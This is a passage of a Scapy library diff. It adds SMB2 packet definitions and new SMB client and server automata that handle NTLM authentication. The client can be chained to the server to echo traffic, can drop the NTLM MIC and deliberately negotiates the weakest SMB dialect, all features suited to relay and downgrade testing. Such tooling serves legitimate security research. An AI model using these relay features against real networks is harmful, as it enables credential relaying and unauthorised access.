"STATUS_INSUFFICIENT_RESOURCES", + 0xC0000120: "STATUS_CANCELLED", 0xC0000128: "STATUS_FILE_CLOSED", # backup error for older Win versions 0xC000000D: "STATUS_INVALID_PARAMETER", + 0xC000000F: "STATUS_NO_SUCH_FILE", 0xC00000BB: "STATUS_NOT_SUPPORTED", + 0xC000019C: "STATUS_FS_DRIVER_REQUIRED", + 0xC0000225: "STATUS_NOT_FOUND", 0x80000005: "STATUS_BUFFER_OVERFLOW", + 0x80000006: "STATUS_NO_MORE_FILES", } # SMB2 sect 2.2.1.1 @@ -152,14 +164,103 @@ # [MS-FSCC] sect 2.4 FileInformationClasses = { - 5: "FileStandardInformation", + 0x01: "FileDirectoryInformation", + 0x02: "FileFullDirectoryInformation", + 0x03: "FileBothDirectoryInformation", + 0x05: "FileStandardInformation", + 0x06: "FileInternalInformation", + 0x22: "FileNetworkOpenInformation", + 0x25: "FileIdBothDirectoryInformation", + 0x26: "FileIdFullDirectoryInformation", + 0x0C: "FileNamesInformation", + 0x3C: "FileIdExtdDirectoryInformation", } +# [MS-FSCC] 2.4.29 FileNetworkOpenInformation + + +class FileNetworkOpenInformation(Packet): + fields_desc = [ + UTCTimeField("CreationTime", None, fmt=" 32: + data_cls = SMB2_CREATE_REQUEST_LEASE_V2 + elif isinstance(self.parent, SMB2_Create_Response): + data_cls = { + b"DHnQ": SMB2_CREATE_DURABLE_HANDLE_RESPONSE, + b"MxAc": SMB2_CREATE_QUERY_MAXIMAL_ACCESS_RESPONSE, + b"QFid": SMB2_CREATE_QUERY_ON_DISK_ID, + b"RqLs": SMB2_CREATE_RESPONSE_LEASE, + b"DH2Q": SMB2_CREATE_DURABLE_HANDLE_RESPONSE_V2, + }[self.Name] + if self.Name == b"RqLs" and self.DataLen > 32: + data_cls = SMB2_CREATE_RESPONSE_LEASE_V2 + else: + return s + except KeyError: + return s + self.Data = data_cls(self.Data.load) + return s + + def default_payload_class(self, _): + return conf.padding_layer + def post_build(self, pkt, pay): # type: (bytes, bytes) -> bytes return _SMB2_post_build(self, pkt, self.OFFSET, { @@ -846,9 +1209,10 @@ def post_build(self, pkt, pay): } -class SMB2_Create_Request(Packet): +class SMB2_Create_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 CREATE Request" OFFSET = 56 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x39), ByteField("ShareType", 0), @@ -905,8 +1269,8 @@ class SMB2_Create_Request(Packet): _NTLMPayloadField( 'Buffer', OFFSET, [ StrFieldUtf16("Name", b""), - PacketListField("CreateContexts", [], SMB2_Create_Context, - length_from=lambda pkt: pkt.CreateContextsLen), + _NextPacketListField("CreateContexts", [], SMB2_Create_Context, + length_from=lambda pkt: pkt.CreateContextsLen), ]) ] @@ -925,24 +1289,13 @@ def post_build(self, pkt, pay): ) -# sect 2.2.14.1 - - -class SMB2_FILEID(Packet): - fields_desc = [ - XLELongField("Persistent", 0), - XLELongField("Volatile", 0) - ] - - def default_payload_class(self, payload): - return conf.padding_layer - # sect 2.2.14 -class SMB2_Create_Response(Packet): +class SMB2_Create_Response(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 CREATE Response" OFFSET = 88 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x59), ByteEnumField("OplockLevel", 0, SMB2_OPLOCK_LEVELS), @@ -953,29 +1306,14 @@ class SMB2_Create_Response(Packet): 0x00000002: "FILE_CREATED", 0x00000003: "FILE_OVERWRITEN", }), - UTCTimeField("CreationTime", None, fmt=" bytes return _SMB2_post_build(self, pkt, self.OFFSET, { - "Data": 4, + "Data": 2, }) + pay @@ -1120,7 +1463,7 @@ def post_build(self, pkt, pay): # sect 2.2.21 -class SMB2_Write_Request(_NTLMPayloadPacket): +class SMB2_Write_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 WRITE Request" OFFSET = 48 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" @@ -1169,7 +1512,7 @@ def post_build(self, pkt, pay): # sect 2.2.22 -class SMB2_Write_Response(Packet): +class SMB2_Write_Response(_SMB2_Payload): name = "SMB2 WRITE Response" fields_desc = [ XLEShortField("StructureSize", 0x11), @@ -1188,10 +1531,27 @@ class SMB2_Write_Response(Packet): Flags=1 ) +# sect 2.2.30 + + +class SMB2_Cancel_Request(_SMB2_Payload): + name = "SMB2 CANCEL Request" + fields_desc = [ + XLEShortField("StructureSize", 0x4), + LEShortField("Reserved", 0), + ] + + +bind_top_down( + SMB2_Header, + SMB2_Cancel_Request, + Command=0x0009, +) + # sect 2.2.31.4 -class SMB2_IOCTL_Validate_Negotiate_Info(Packet): +class SMB2_IOCTL_Validate_Negotiate_Info_Request(Packet): name = "SMB2 IOCTL Validate Negotiate Info" fields_desc = ( SMB2_Negotiate_Protocol_Request.fields_desc[4:6] + # Cap/GUID @@ -1200,17 +1560,16 @@ class SMB2_IOCTL_Validate_Negotiate_Info(Packet): ) -class _SMB2_IOCTL_PacketLenField(PacketLenField): +# sect 2.2.31 + +class _SMB2_IOCTL_Request_PacketLenField(PacketLenField): def m2i(self, pkt, m): if pkt.CtlCode == 0x00140204: # FSCTL_VALIDATE_NEGOTIATE_INFO - return SMB2_IOCTL_Validate_Negotiate_Info(m) + return SMB2_IOCTL_Validate_Negotiate_Info_Request(m) return conf.raw_layer(m) -# sect 2.2.31 - - -class SMB2_IOCTL_Request(_NTLMPayloadPacket): +class SMB2_IOCTL_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 IOCTL Request" OFFSET = 56 + 64 _NTLM_PAYLOAD_FIELD_NAME = "Buffer" @@ -1251,10 +1610,10 @@ class SMB2_IOCTL_Request(_NTLMPayloadPacket): LEIntField("Reserved2", 0), _NTLMPayloadField( 'Buffer', OFFSET, [ - _SMB2_IOCTL_PacketLenField( + _SMB2_IOCTL_Request_PacketLenField( "Input", None, conf.raw_layer, length_from=lambda pkt: pkt.InputLen), - _SMB2_IOCTL_PacketLenField( + _SMB2_IOCTL_Request_PacketLenField( "Output", None, conf.raw_layer, length_from=lambda pkt: pkt.OutputLen), ], @@ -1275,19 +1634,55 @@ def post_build(self, pkt, pay): Command=0x000B, ) +# sect 2.2.32.6 + + +class SMB2_IOCTL_Validate_Negotiate_Info_Response(Packet): + name = "SMB2 IOCTL Validate Negotiate Info" + fields_desc = ( + SMB2_Negotiate_Protocol_Response.fields_desc[4:6][::-1] + # Cap/GUID + SMB2_Negotiate_Protocol_Response.fields_desc[1:3] # SecMod/DialectRevision + ) + # sect 2.2.32 -class SMB2_IOCTL_Response(Packet): +class _SMB2_IOCTL_Response_PacketLenField(PacketLenField): + def m2i(self, pkt, m): + if pkt.CtlCode == 0x00140204: # FSCTL_VALIDATE_NEGOTIATE_INFO + return SMB2_IOCTL_Validate_Negotiate_Info_Response(m) + return conf.raw_layer(m) + + +class SMB2_IOCTL_Response(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 IOCTL Response" - # Barely implemented + OFFSET = 48 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" StructureSize = 0x31 fields_desc = ( SMB2_IOCTL_Request.fields_desc[:6] + SMB2_IOCTL_Request.fields_desc[7:9] + - SMB2_IOCTL_Request.fields_desc[10:] + SMB2_IOCTL_Request.fields_desc[10:12] + [ + _NTLMPayloadField( + 'Buffer', OFFSET, [ + _SMB2_IOCTL_Response_PacketLenField( + "Input", None, conf.raw_layer, + length_from=lambda pkt: pkt.InputLen), + _SMB2_IOCTL_Response_PacketLenField( + "Output", None, conf.raw_layer, + length_from=lambda pkt: pkt.OutputLen), + ], + ), + ] ) + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Input": 24, + "Output": 32, + }) + pay + bind_top_down( SMB2_Header, @@ -1296,6 +1691,148 @@ class SMB2_IOCTL_Response(Packet): Flags=1 # SMB2_FLAGS_SERVER_TO_REDIR ) +# sect 2.2.33 + + +class SMB2_Query_Directory_Request(_SMB2_Payload, _NTLMPayloadPacket): + name = "SMB2 QUERY DIRECTORY Request" + OFFSET = 32 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" + fields_desc = [ + XLEShortField("StructureSize", 0x21), + ByteEnumField("FileInformationClass", 0x1, FileInformationClasses), + FlagsField("Flags", 0, -8, { + 0x01: "SMB2_RESTART_SCANS", + 0x02: "SMB2_RETURN_SINGLE_ENTRY", + 0x04: "SMB2_INDEX_SPECIFIED", + 0x10: "SMB2_REOPEN", + }), + LEIntField("FileIndex", 0), + PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), + LEShortField("FileNameBufferOffset", None), + LEShortField("FileNameLen", None), + LEIntField("OutputBufferLength", 2048), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + StrFieldUtf16("FileName", b"") + ]) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "FileName": 24, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Query_Directory_Request, + Command=0x000E, +) + +# sect 2.2.34 + + +class SMB2_Query_Directory_Response(_SMB2_Payload, _NTLMPayloadPacket): + name = "SMB2 QUERY DIRECTORY Response" + OFFSET = 8 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" + fields_desc = [ + XLEShortField("StructureSize", 0x9), + LEShortField("OutputBufferOffset", None), + LEIntField("OutputLen", None), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + # TODO + StrFixedLenField("Output", b"", + length_from=lambda pkt: pkt.OutputLen) + ]) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Output": 2, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Query_Directory_Response, + Command=0x000E, + Flags=1, +) + +# sect 2.2.35 + + +class SMB2_Change_Notify_Request(_SMB2_Payload): + name = "SMB2 CHANGE NOTIFY Request" + fields_desc = [ + XLEShortField("StructureSize", 0x20), + FlagsField("Flags", 0, -16, { + 0x0001: "SMB2_WATCH_TREE", + }), + LEIntField("OutputBufferLength", 2048), + PacketField("FileId", SMB2_FILEID(), SMB2_FILEID), + FlagsField("CompletionFilter", 0, -32, { + 0x00000001: "FILE_NOTIFY_CHANGE_FILE_NAME", + 0x00000002: "FILE_NOTIFY_CHANGE_DIR_NAME", + 0x00000004: "FILE_NOTIFY_CHANGE_ATTRIBUTES", + 0x00000008: "FILE_NOTIFY_CHANGE_SIZE", + 0x00000010: "FILE_NOTIFY_CHANGE_LAST_WRITE", + 0x00000020: "FILE_NOTIFY_CHANGE_LAST_ACCESS", + 0x00000040: "FILE_NOTIFY_CHANGE_CREATION", + 0x00000080: "FILE_NOTIFY_CHANGE_EA", + 0x00000100: "FILE_NOTIFY_CHANGE_SECURITY", + 0x00000200: "FILE_NOTIFY_CHANGE_STREAM_NAME", + 0x00000400: "FILE_NOTIFY_CHANGE_STREAM_SIZE", + 0x00000800: "FILE_NOTIFY_CHANGE_STREAM_WRITE" + }), + LEIntField("Reserved", 0), + ] + + +bind_top_down( + SMB2_Header, + SMB2_Change_Notify_Request, + Command=0x000F, +) + +# sect 2.2.36 + + +class SMB2_Change_Notify_Response(_SMB2_Payload, _NTLMPayloadPacket): + name = "SMB2 CHANGE NOTIFY Response" + OFFSET = 8 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" + fields_desc = [ + XLEShortField("StructureSize", 0x9), + LEShortField("OutputBufferOffset", None), + LEIntField("OutputLen", None), + _NTLMPayloadField( + 'Buffer', OFFSET, [ + # TODO + StrFixedLenField("Output", b"", + length_from=lambda pkt: pkt.OutputLen) + ]) + ] + + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Output": 2, + }) + pay + + +bind_top_down( + SMB2_Header, + SMB2_Change_Notify_Response, + Command=0x000F, + Flags=1, +) + # sect 2.2.37 @@ -1334,9 +1871,10 @@ class SMB2_Query_Quota_Info(Packet): ] -class SMB2_Query_Info_Request(Packet): +class SMB2_Query_Info_Request(_SMB2_Payload, _NTLMPayloadPacket): name = "SMB2 QUERY INFO Request" OFFSET = 40 + 64 + _NTLM_PAYLOAD_FIELD_NAME = "Buffer" fields_desc = [ XLEShortField("StructureSize", 0x29), ByteEnumField("InfoType", 0, { @@ -1387,7 +1925,7 @@ def post_build(self, pkt, pay): ) -class SMB2_Query_Info_Response(Packet): +class SMB2_Query_Info_Response(_SMB2_Payload): name = "SMB2 QUERY INFO Response" OFFSET = 8 + 64 fields_desc = [ @@ -1415,3 +1953,23 @@ def post_build(self, pkt, pay): Command=0x00010, Flags=1, ) + + +# sect 2.2.42.1 + + +class SMB2_Compression_Transform_Header(Packet): + name = "SMB2 Compression Transform Header" + fields_desc = [ + StrFixedLenField("Start", b"\xfcSMB", 4), + LEIntField("OriginalCompressedSegmentSize", 0x0), + LEShortEnumField( + "CompressionAlgorithm", 0, + SMB2_COMPRESSION_ALGORITHMS + ), + ShortEnumField("Flags", 0x0, { + 0x0000: "SMB2_COMPRESSION_FLAG_NONE", + 0x0001: "SMB2_COMPRESSION_FLAG_CHAINED", + }), + XLEIntField("Offset_or_Length", 0), + ] diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py new file mode 100644 index 00000000000..3bf8a917ac4 --- /dev/null +++ b/scapy/layers/smbclient.py @@ -0,0 +1,414 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +SMB 1 / 2 Client Automaton +""" + +from scapy.automaton import ATMT, Automaton +from scapy.layers.ntlm import ( + NTLM_AUTHENTICATE, + NTLM_AUTHENTICATE_V2, + NTLM_NEGOTIATE, + NTLM_Client, +) +from scapy.packet import Raw +from scapy.volatile import RandUUID + +from scapy.layers.netbios import NBTSession +from scapy.layers.gssapi import ( + GSSAPI_BLOB, + SPNEGO_MechListMIC, + SPNEGO_MechType, + SPNEGO_Token, + SPNEGO_negToken, + SPNEGO_negTokenInit, + SPNEGO_negTokenResp, +) +from scapy.layers.smb import ( + SMB_Header, + SMB_Dialect, + SMBNegotiate_Request, + SMBNegotiate_Response_Security, + SMBNegotiate_Response_Extended_Security, + SMBSession_Null, + SMBSession_Setup_AndX_Request, + SMBSession_Setup_AndX_Request_Extended_Security, + SMBSession_Setup_AndX_Response, + SMBSession_Setup_AndX_Response_Extended_Security, + SMBTree_Connect_AndX, +) +from scapy.layers.smb2 import ( + SMB2_Header, + SMB2_Negotiate_Protocol_Request, + SMB2_Negotiate_Protocol_Response, + SMB2_Session_Setup_Request, + SMB2_Session_Setup_Response, + SMB2_Tree_Connect_Request, +) +from scapy.layers.smbserver import NTLM_SMB_Server + + +class NTLM_SMB_Client(NTLM_Client, Automaton): + port = 445 + cls = NBTSession + kwargs_cls = { + NTLM_SMB_Server: {"CLIENT_PROVIDES_NEGOEX": True, "ECHO": True} + } + + def __init__(self, *args, **kwargs): + self.EXTENDED_SECURITY = kwargs.pop("EXTENDED_SECURITY", True) + self.ALLOW_SMB2 = kwargs.pop("ALLOW_SMB2", True) + self.REAL_HOSTNAME = kwargs.pop("REAL_HOSTNAME", None) + self.RETURN_SOCKET = kwargs.pop("RETURN_SOCKET", None) + self.RUN_SCRIPT = kwargs.pop("RUN_SCRIPT", None) + self.SMB2 = False + super(NTLM_SMB_Client, self).__init__(*args, **kwargs) + + @ATMT.state(initial=1) + def BEGIN(self): + pass + + @ATMT.condition(BEGIN) + def continue_smb2(self): + kwargs = self.wait_server() + self.CONTINUE_SMB2 = kwargs.pop("CONTINUE_SMB2", False) + self.SMB2_INIT_PARAMS = kwargs.pop("SMB2_INIT_PARAMS", {}) + if self.CONTINUE_SMB2: + self.SMB2 = True + self.smb_header = NBTSession() / SMB2_Header( + PID=0xfeff + ) + raise self.SMB2_NEGOTIATE() + + @ATMT.condition(BEGIN, prio=1) + def send_negotiate(self): + raise self.SENT_NEGOTIATE() + + @ATMT.action(send_negotiate) + def on_negotiate(self): + self.smb_header = NBTSession() / SMB_Header( + Flags2=( + "LONG_NAMES+EAS+NT_STATUS+UNICODE+" + "SMB_SECURITY_SIGNATURE+EXTENDED_SECURITY" + ), + TID=0xFFFF, + PIDLow=0xFEFF, + UID=0, + MID=0 + ) + if self.EXTENDED_SECURITY: + self.smb_header.Flags2 += "EXTENDED_SECURITY" + pkt = self.smb_header.copy() / SMBNegotiate_Request( + Dialects=[SMB_Dialect(DialectString=x) for x in [ + "PC NETWORK PROGRAM 1.0", "LANMAN1.0", + "Windows for Workgroups 3.1a", "LM1.2X002", "LANMAN2.1", + "NT LM 0.12" + ] + (["SMB 2.002", "SMB 2.???"] if self.ALLOW_SMB2 else []) + ], + ) + if not self.EXTENDED_SECURITY: + pkt.Flags2 -= "EXTENDED_SECURITY" + pkt[SMB_Header].Flags2 = pkt[SMB_Header].Flags2 - \ + "SMB_SECURITY_SIGNATURE" + \ + "SMB_SECURITY_SIGNATURE_REQUIRED+IS_LONG_NAME" + self.send(pkt) + + @ATMT.state() + def SENT_NEGOTIATE(self): + pass + + @ATMT.receive_condition(SENT_NEGOTIATE) + def receive_negotiate_response(self, pkt): + if SMBNegotiate_Response_Security in pkt or\ + SMBNegotiate_Response_Extended_Security in pkt or\ + SMB2_Negotiate_Protocol_Response in pkt: + self.set_srv( + "ServerTime", + pkt.ServerTime + ) + self.set_srv( + "SecurityMode", + pkt.SecurityMode + ) + if SMB2_Negotiate_Protocol_Response in pkt: + # SMB2 + self.SMB2 = True # We are using SMB2 to talk to the server + self.smb_header = NBTSession() / SMB2_Header( + PID=0xfeff + ) + else: + # SMB1 + self.set_srv( + "ServerTimeZone", + pkt.ServerTimeZone + ) + if SMBNegotiate_Response_Extended_Security in pkt or\ + SMB2_Negotiate_Protocol_Response in pkt: + # Extended SMB1 / SMB2 + negoex_tuple = self._get_token( + pkt.SecurityBlob + ) + self.set_srv( + "GUID", + pkt.GUID + ) + self.received_ntlm_token(negoex_tuple) + if SMB2_Negotiate_Protocol_Response in pkt and \ + pkt.DialectRevision in [0x02ff, 0x03ff]: + # There will be a second negotiate protocol request + self.smb_header.MID += 1 + raise self.SMB2_NEGOTIATE() + else: + raise self.NEGOTIATED() + elif SMBNegotiate_Response_Security in pkt: + # Non-extended SMB1 + self.set_srv("Challenge", pkt.Challenge) + self.set_srv("DomainName", pkt.DomainName) + self.set_srv("ServerName", pkt.ServerName) + self.received_ntlm_token((None, None, None, None)) + raise self.NEGOTIATED() + + @ATMT.state() + def SMB2_NEGOTIATE(self): + pass + + @ATMT.condition(SMB2_NEGOTIATE) + def send_negotiate_smb2(self): + raise self.SENT_NEGOTIATE() + + @ATMT.action(send_negotiate_smb2) + def on_negotiate_smb2(self): + pkt = self.smb_header.copy() / SMB2_Negotiate_Protocol_Request( + # Only ask for SMB 2.0.2 because it has the lowest security + Dialects=[0x0202], + Capabilities=( + "DFS+Leasing+LargeMTU+MultiChannel+" + "PersistentHandles+DirectoryLeasing+Encryption" + ), + SecurityMode=0, + ClientGUID=self.SMB2_INIT_PARAMS.get("ClientGUID", RandUUID()), + ) + self.send(pkt) + + @ATMT.state() + def NEGOTIATED(self): + pass + + @ATMT.condition(NEGOTIATED) + def should_send_setup_andx_request(self): + ntlm_tuple = self.get_token() + raise self.SENT_SETUP_ANDX_REQUEST().action_parameters(ntlm_tuple) + + @ATMT.state() + def SENT_SETUP_ANDX_REQUEST(self): + pass + + @ATMT.action(should_send_setup_andx_request) + def send_setup_andx_request(self, ntlm_tuple): + ntlm_token, negResult, MIC, rawToken = ntlm_tuple + self.smb_header.MID = self.get("MID") + self.smb_header.TID = self.get("TID") + if self.SMB2: + self.smb_header.AsyncId = self.get("AsyncId") + self.smb_header.SessionId = self.get("SessionId") + else: + self.smb_header.UID = self.get("UID", 0) + if self.SMB2 or self.EXTENDED_SECURITY: + # SMB1 extended / SMB2 + if self.SMB2: + # SMB2 + pkt = self.smb_header.copy() / SMB2_Session_Setup_Request( + Capabilities="DFS", + SecurityMode=0, + ) + pkt.CreditsRequested = 33 + else: + # SMB1 extended + pkt = self.smb_header.copy() / \ + SMBSession_Setup_AndX_Request_Extended_Security( + ServerCapabilities=( + "UNICODE+NT_SMBS+STATUS32+LEVEL_II_OPLOCKS+" + "DYNAMIC_REAUTH+EXTENDED_SECURITY" + ), + VCNumber=self.get("VCNumber"), + NativeOS=b"", + NativeLanMan=b"" + ) + pkt.SecuritySignature = self.get("SecuritySignature") + if isinstance(ntlm_token, NTLM_NEGOTIATE): + if rawToken: + pkt.SecurityBlob = ntlm_token + else: + pkt.SecurityBlob = GSSAPI_BLOB( + innerContextToken=SPNEGO_negToken( + token=SPNEGO_negTokenInit( + mechTypes=[ + # NTLMSSP + SPNEGO_MechType(oid="1.3.6.1.4.1.311.2.2.10")], # noqa: E501 + mechToken=SPNEGO_Token( + value=ntlm_token + ) + ) + ) + ) + elif isinstance(ntlm_token, (NTLM_AUTHENTICATE, + NTLM_AUTHENTICATE_V2)): + pkt.SecurityBlob = SPNEGO_negToken( + token=SPNEGO_negTokenResp( + negResult=negResult, + ) + ) + # Token may be missing (e.g. STATUS_MORE_PROCESSING_REQUIRED) + if ntlm_token: + pkt.SecurityBlob.token.responseToken = SPNEGO_Token( + value=ntlm_token + ) + if MIC and not self.DROP_MIC: # Drop the MIC? + pkt.SecurityBlob.token.mechListMIC = SPNEGO_MechListMIC( + value=MIC + ) + else: + # Non-extended security + pkt = self.smb_header.copy() / SMBSession_Setup_AndX_Request( + ServerCapabilities="UNICODE+NT_SMBS+STATUS32+LEVEL_II_OPLOCKS", + VCNumber=self.get("VCNumber"), + NativeOS=b"", + NativeLanMan=b"", + OEMPassword=b"\0" * 24, + UnicodePassword=ntlm_token, + PrimaryDomain=self.get("PrimaryDomain"), + AccountName=self.get("AccountName"), + ) / SMBTree_Connect_AndX( + Flags="EXTENDED_RESPONSE", + Password=b"\0", + ) + pkt.PrimaryDomain = self.get("PrimaryDomain") + pkt.AccountName = self.get("AccountName") + pkt.Path = ( + "\\\\%s\\" % self.REAL_HOSTNAME + + self.get("Path")[2:].split("\\", 1)[1] + ) + pkt.Service = self.get("Service") + self.send(pkt) + + @ATMT.receive_condition(SENT_SETUP_ANDX_REQUEST) + def receive_setup_andx_response(self, pkt): + if SMBSession_Null in pkt or \ + SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ + SMBSession_Setup_AndX_Response in pkt: + # SMB1 + self.set_srv("Status", pkt[SMB_Header].Status) + self.set_srv( + "UID", + pkt[SMB_Header].UID + ) + self.set_srv( + "MID", + pkt[SMB_Header].MID + ) + self.set_srv( + "TID", + pkt[SMB_Header].TID + ) + if SMBSession_Null in pkt: + # Likely an error + self.received_ntlm_token((None, None, None, None)) + raise self.NEGOTIATED() + elif SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ + SMBSession_Setup_AndX_Response in pkt: + self.set_srv( + "NativeOS", + pkt.getfieldval( + "NativeOS") + ) + self.set_srv( + "NativeLanMan", + pkt.getfieldval( + "NativeLanMan") + ) + if SMB2_Session_Setup_Response in pkt: + # SMB2 + self.set_srv("Status", pkt.Status) + self.set_srv("SecuritySignature", pkt.SecuritySignature) + self.set_srv("MID", pkt.MID) + self.set_srv("TID", pkt.TID) + self.set_srv("AsyncId", pkt.AsyncId) + self.set_srv("SessionId", pkt.SessionId) + if SMBSession_Setup_AndX_Response_Extended_Security in pkt or \ + SMB2_Session_Setup_Response in pkt: + # SMB1 extended / SMB2 + _, negResult, _, _ = ntlm_tuple = self._get_token( + pkt.SecurityBlob + ) + if negResult == 0: # Authenticated + self.received_ntlm_token(ntlm_tuple) + raise self.AUTHENTICATED() + else: + self.received_ntlm_token(ntlm_tuple) + raise self.NEGOTIATED().action_parameters(pkt) + elif SMBSession_Setup_AndX_Response_Extended_Security in pkt: + # SMB1 non-extended + pass + + @ATMT.state() + def AUTHENTICATED(self): + pass + + @ATMT.condition(AUTHENTICATED, prio=0) + def authenticated_post_actions(self): + if self.RETURN_SOCKET: + raise self.SOCKET_MODE() + if self.RUN_SCRIPT: + raise self.DO_RUN_SCRIPT() + + @ATMT.receive_condition(AUTHENTICATED, prio=1) + def receive_packet(self, pkt): + raise self.AUTHENTICATED().action_parameters(pkt) + + @ATMT.action(receive_packet) + def pass_packet(self, pkt): + self.echo(pkt) + + @ATMT.state(final=1) + def DO_RUN_SCRIPT(self): + # This is an example script, mostly unimplemented... + # Tree connect + self.smb_header.MID += 1 + self.send( + self.smb_header.copy() / + SMB2_Tree_Connect_Request( + Buffer=[('Path', '\\\\%s\\IPC$' % self.REAL_HOSTNAME)] + ) + ) + # Create srvsvc + self.smb_header.MID += 1 + pkt = self.smb_header.copy() + pkt.Command = "SMB2_CREATE" + pkt /= Raw(load=b'9\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x12\x00\x00\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00x\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00s\x00r\x00v\x00s\x00v\x00c\x00') # noqa: E501 + self.send(pkt) + # ... run something? + self.end() + + @ATMT.state() + def SOCKET_MODE(self): + pass + + @ATMT.receive_condition(SOCKET_MODE) + def incoming_data_received(self, pkt): + raise self.SOCKET_MODE().action_parameters(pkt) + + @ATMT.action(incoming_data_received) + def receive_data(self, pkt): + self.oi.smbpipe.send(bytes(pkt)) + + @ATMT.ioevent(SOCKET_MODE, name="smbpipe", as_supersocket="smblink") + def outgoing_data_received(self, fd): + raise self.ESTABLISHED().action_parameters(fd.recv()) + + @ATMT.action(outgoing_data_received) + def send_data(self, d): + self.smb_header.MID += 1 + self.send(self.smb_header.copy() / d) diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py new file mode 100644 index 00000000000..d5cba5c584f --- /dev/null +++ b/scapy/layers/smbserver.py @@ -0,0 +1,498 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +SMB 1 / 2 Server Automaton +""" + +import time + +from scapy.automaton import ATMT, Automaton +from scapy.layers.ntlm import ( + NTLM_CHALLENGE, + NTLM_Server, +) +from scapy.volatile import RandUUID + +from scapy.layers.netbios import NBTSession +from scapy.layers.gssapi import ( + GSSAPI_BLOB, + SPNEGO_MechListMIC, + SPNEGO_MechType, + SPNEGO_Token, + SPNEGO_negToken, + SPNEGO_negTokenInit, + SPNEGO_negTokenResp, +) +from scapy.layers.smb import ( + SMB_Header, + SMBNegotiate_Request, + SMBNegotiate_Response_Security, + SMBNegotiate_Response_Extended_Security, + SMBSession_Null, + SMBSession_Setup_AndX_Request, + SMBSession_Setup_AndX_Request_Extended_Security, + SMBSession_Setup_AndX_Response, + SMBSession_Setup_AndX_Response_Extended_Security, + SMBTree_Connect_AndX, +) +from scapy.layers.smb2 import ( + SMB2_Header, + SMB2_IOCTL_Response, + SMB2_IOCTL_Validate_Negotiate_Info_Response, + SMB2_Negotiate_Protocol_Request, + SMB2_Negotiate_Protocol_Response, + SMB2_Session_Setup_Request, + SMB2_Session_Setup_Response, + SMB2_IOCTL_Request, + SMB2_Error_Response, +) + + +class NTLM_SMB_Server(NTLM_Server, Automaton): + port = 445 + cls = NBTSession + + def __init__(self, *args, **kwargs): + self.CLIENT_PROVIDES_NEGOEX = kwargs.pop("CLIENT_PROVIDES_NEGOEX", False) + self.ECHO = kwargs.pop("ECHO", False) + self.ANONYMOUS_LOGIN = kwargs.pop("ANONYMOUS_LOGIN", False) + self.GUEST_LOGIN = kwargs.pop("GUEST_LOGIN", False) + self.PASS_NEGOEX = kwargs.pop("PASS_NEGOEX", False) + self.EXTENDED_SECURITY = kwargs.pop("EXTENDED_SECURITY", True) + self.ALLOW_SMB2 = kwargs.pop("ALLOW_SMB2", True) + self.REQUIRE_SIGNATURE = kwargs.pop("REQUIRE_SIGNATURE", False) + self.REAL_HOSTNAME = kwargs.pop( + "REAL_HOSTNAME", None + ) # Compulsory for SMB1 !!! + assert self.ALLOW_SMB2 or self.REAL_HOSTNAME, "SMB1 requires REAL_HOSTNAME !" + # Session information + self.SMB2 = False + self.Dialect = None + self.GUID = False + super(NTLM_SMB_Server, self).__init__(*args, **kwargs) + + def send(self, pkt): + if self.Dialect and self.SigningSessionKey: + if isinstance(pkt.payload, SMB2_Header): + # Sign SMB2 ! + smb = pkt[SMB2_Header] + smb.Flags += "SMB2_FLAGS_SIGNED" + smb.sign(self.Dialect, self.SigningSessionKey) + return super(NTLM_SMB_Server, self).send(pkt) + + @ATMT.state(initial=1) + def BEGIN(self): + self.authenticated = False + assert ( + not self.ECHO or self.cli_atmt + ), "Cannot use ECHO without binding to a client !" + + @ATMT.receive_condition(BEGIN) + def received_negotiate(self, pkt): + if SMBNegotiate_Request in pkt: + if self.cli_atmt: + self.start_client() + raise self.NEGOTIATED().action_parameters(pkt) + + @ATMT.receive_condition(BEGIN) + def received_negotiate_smb2_begin(self, pkt): + if SMB2_Negotiate_Protocol_Request in pkt: + self.SMB2 = True + if self.cli_atmt: + self.start_client( + CONTINUE_SMB2=True, SMB2_INIT_PARAMS={"ClientGUID": pkt.ClientGUID} + ) + raise self.NEGOTIATED().action_parameters(pkt) + + @ATMT.action(received_negotiate_smb2_begin) + def on_negotiate_smb2_begin(self, pkt): + self.on_negotiate(pkt) + + @ATMT.action(received_negotiate) + def on_negotiate(self, pkt): + if 